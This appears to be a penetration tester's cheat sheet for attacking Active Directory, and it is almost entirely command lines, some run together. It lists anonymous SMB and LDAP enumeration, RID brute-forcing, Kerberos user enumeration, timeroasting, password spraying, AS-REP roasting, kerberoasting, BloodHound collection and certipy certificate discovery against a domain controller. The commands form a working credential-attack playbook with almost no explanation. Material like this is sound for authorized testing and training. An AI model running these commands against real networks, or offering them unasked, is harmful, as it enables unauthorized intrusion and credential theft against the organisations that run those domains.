nxc smb <target_ip> enum4linux -a <target_ip> nmap -n -sV --script "ldap* and not brute" -p 389 <dc_ip> ldapsearch -x -H <dc_ip> -s base
dig axfr <domain> @<dc_ip>
nxc smb <dc_ip> -u '' -p '' --shares nxc smb <dc_ip> -u 'guest' -p '' --shares
nxc smb <dc_ip> --users nxc smb <dc_ip> --rid-brute 10000
kerbrute userenum -d <domain> <user_wordlist>
If you find this error from Linux: KRB_AP_ERR_SKEW(Clock skew too great) it's because of your local time, you need to synchronise the host with the DC.
KRB_AP_ERR_SKEW(Clock skew too great)
timeroast.py <dc_ip>
nxc smb <dc_ip> -u <user_wordlist> -p <password_wordlist> --no-bruteforce --continue-on-success
nxc ldap <dc_ip> -u <user_wordlist> -p '' --asreproast <output>
GetNPUsers.py <domain>/ -usersfile <user_wordlist>
GetUserSPNs.py -no-preauth <asrep_user> -usersfile <user_wordlist> -dc-host <dc_ip> <domain>/
nxc smb <dc_ip> -u <user> -p <password> --users
nxc smb <dc_ip> -u <user> -p <password> -M spider_plus
smbclient.py <user>:<password>@<dc_ip>
bloodhound-ce-python -d <domain> -u <user> -p <password> [-ns <dc_ip>] -c All --zip
ldapdomaindump.py -u <domain>\<user> -p <password> -o <output_folder> <dc_ip>
certipy find -u <user>@<domain> -p <password> -dc-ip <dc_ip> -stdout
nxc ldap <dc_ip> -u <user> -p <password> --kerberoasting $OUTPUT_FILE
GetUserSPNs.py -request -dc-ip <dc_ip> <domain>/<user>:$PASSWORD
sudo ntpdate <dc_ip>